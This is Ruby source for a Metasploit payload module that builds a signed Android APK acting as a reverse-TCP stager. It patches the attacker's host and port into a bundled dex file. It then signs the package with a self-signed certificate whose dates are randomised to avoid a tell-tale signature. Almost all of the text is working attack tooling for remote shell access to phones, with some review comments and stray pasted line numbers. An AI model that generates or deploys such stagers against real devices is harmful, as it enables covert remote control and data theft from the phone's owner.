reverse_tcp_dns

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  5.  
  6. require 'msf/core'
  7. require 'msf/core/handler/reverse_tcp'
  8. require 'msf/base/sessions/command_shell'
  9. require 'msf/base/sessions/command_shell_options'
  10.  
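module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Dalvik

  # Fixed-width (32-byte, space-padded) markers baked into the bundled
  # classes.dex. Substitutions must never change the file length, so every
  # value is padded back to the marker's width (see #string_sub).
  LHOST_PLACEHOLDER = '127.0.0.1                       '.freeze
  LPORT_PLACEHOLDER = '4444                            '.freeze

  # Dalvik (Android) connect-back stager. Despite the "DNS" in the name,
  # nothing here resolves names itself: the session is handled by the
  # standard reverse TCP handler, and "DNS port" presumably refers only to
  # the LPORT the operator chooses (e.g. 53) — confirm with the author.
  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Dalvik Reverse TCP DNS Stager',
      'Description' => 'Connect back stager',
      'Author'      => 'timwr (DNS port by Edszx)',
      'License'     => MSF_LICENSE,
      'Platform'    => 'android',
      'Arch'        => ARCH_DALVIK,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Stager'      => {'Payload' => ""}
    ))
  end

  # Replace a fixed-width placeholder inside the dex bytes with +input+ in
  # place, right-padding with spaces so the data keeps its exact byte length
  # (a longer or shorter dex would invalidate the offsets in its header).
  #
  # @param data [String] dex contents; mutated in place
  # @param placeholder [String] the exact, space-padded marker to replace
  # @param input [#to_s] value to write; must fit within placeholder.bytesize
  # @return [String, nil] +data+ if a substitution happened, nil if the
  #   placeholder was not present (same contract as String#gsub!)
  # @raise [ArgumentError] if +input+ is longer than the placeholder; the
  #   original code failed here too, but with an opaque "negative argument"
  #   error from String#*
  def string_sub(data, placeholder, input)
    value = input.to_s
    pad = placeholder.bytesize - value.bytesize
    if pad < 0
      raise ArgumentError,
            "value #{value.inspect} does not fit in the #{placeholder.bytesize}-byte placeholder"
    end
    # Block form: the replacement is inserted literally, so a value containing
    # backslashes is not expanded as a gsub back-reference.
    data.gsub!(placeholder) { value + (' ' * pad) }
  end

  # Build the signed APK (as a Rex::Zip::Jar) that carries this stager.
  #
  # The prebuilt dex shipped under data/android/apk contains fixed-width
  # placeholders for the callback host and port. They are patched in place
  # with LHOST/LPORT, the dex header is fixed up by fix_dex_header (supplied
  # by Msf::Payload::Dalvik), the remaining APK resources are added, and the
  # archive is signed with a freshly generated self-signed certificate.
  #
  # @param opts [Hash] currently unused; kept for interface compatibility
  # @return [Rex::Zip::Jar] the signed jar
  # @raise [RuntimeError] if a placeholder is missing from the bundled dex;
  #   silently continuing would produce a payload that calls back to the
  #   baked-in 127.0.0.1:4444 instead of the operator's LHOST/LPORT
  # @raise [ArgumentError] if LHOST or LPORT does not fit its placeholder
  def generate_jar(opts={})
    apk_dir  = File.join(Msf::Config.data_directory, 'android', 'apk')
    dex_path = File.join(apk_dir, 'classes.dex')

    jar = Rex::Zip::Jar.new
    classes = File.binread(dex_path)

    {
      LHOST_PLACEHOLDER => datastore['LHOST'],
      LPORT_PLACEHOLDER => datastore['LPORT']
    }.each do |placeholder, value|
      next unless value # option unset: keep whatever the bundled dex contains
      unless string_sub(classes, placeholder, value)
        raise "placeholder #{placeholder.strip.inspect} not found in #{dex_path}"
      end
    end
    jar.add_file("classes.dex", fix_dex_header(classes))

    jar.add_files([
      [ "AndroidManifest.xml" ],
      [ "res", "drawable-mdpi", "icon.png" ],
      [ "res", "layout", "main.xml" ],
      [ "resources.arsc" ]
    ], apk_dir)
    jar.build_manifest

    key, cert = signing_identity
    jar.sign(key, cert, [cert])

    jar
  end

  private

  # Generate a throwaway RSA key and matching self-signed X.509 certificate,
  # used only to sign the APK (Android rejects unsigned packages).
  #
  # @return [Array(OpenSSL::PKey::RSA, OpenSSL::X509::Certificate)]
  def signing_identity
    x509_name = OpenSSL::X509::Name.parse(
      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
    )
    # NOTE(review): 1024-bit RSA is weak by current standards. The key only
    # signs the APK, but consider 2048 bits so newer signing/verification
    # tooling does not warn on or reject the package.
    key  = OpenSSL::PKey::RSA.new(1024)

    cert = OpenSSL::X509::Certificate.new
    cert.version = 2          # X.509 v3
    cert.serial = 1
    cert.subject = x509_name
    cert.issuer = x509_name   # self-signed: issuer == subject
    cert.public_key = key.public_key

    # Some time within the last 3 years (randomised, presumably so that each
    # generated certificate does not share one tell-tale creation time).
    cert.not_before = Time.now - rand(3600*24*365*3)

    # From http://developer.android.com/tools/publishing/app-signing.html
    # """
    # A validity period of more than 25 years is recommended.
    #
    # If you plan to publish your application(s) on Google Play, note
    # that a validity period ending after 22 October 2033 is a
    # requirement. You can not upload an application if it is signed
    # with a key whose validity expires before that date.
    # """
    # 0x78045d81 is 2033-10-22 00:00:01 UTC; expiry is a random instant between
    # then and the 32-bit time_t limit (0x7fffffff).
    cert.not_after = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))

    [key, cert]
  end

end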